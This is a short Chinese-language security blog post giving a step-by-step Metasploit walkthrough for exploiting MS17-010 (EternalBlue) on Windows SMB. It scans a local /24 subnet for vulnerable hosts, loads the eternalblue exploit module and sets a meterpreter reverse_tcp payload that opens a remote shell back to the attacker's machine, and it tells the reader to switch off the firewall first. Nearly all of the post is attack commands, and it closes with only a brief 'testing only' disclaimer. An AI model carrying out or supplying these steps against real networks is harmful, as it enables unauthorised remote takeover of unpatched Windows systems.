名名网安_SecurityBlog 信言不美,美言不信。善者不辩,辩者不善。知者不博,博者不知。
Meterpreter下eternalblue模块利用
发表于 2018-1-24 | | technology
首先检查防火墙状态并关闭
[root@admin ~]# msfconsole
启动msf

msf > search eternalblue
搜索模块

先扫描有漏洞主机
msf > use auxiliary/scanner/smb/smb_ms17_010
加载扫描模块

msf > set rhosts 192.168.2.1/24
设置扫描IP直接扫描C段

msf > run
开始扫描

扫出提示: Host is likely VULNERABLE to MS17-010!的可以尝试利用
6.png

msf  > use exploit/windows/smb/ms17_010_eternalblue
加载攻击模块

msf  >set RHOST 192.168.2.9
设置有漏洞的IP

msf  >set LHOST 192.168.2.3
设置本地本机IP


msf  >set payload windows/x64/meterpreter/reverse_tcp
设置payload

msf  >exploit
攻击

成功获取权限
ac.png

7.png

文章内容涉及具有攻击性,仅用作测试,严禁破坏,后果自负。

发表评论:

未显示?请点击刷新

TOP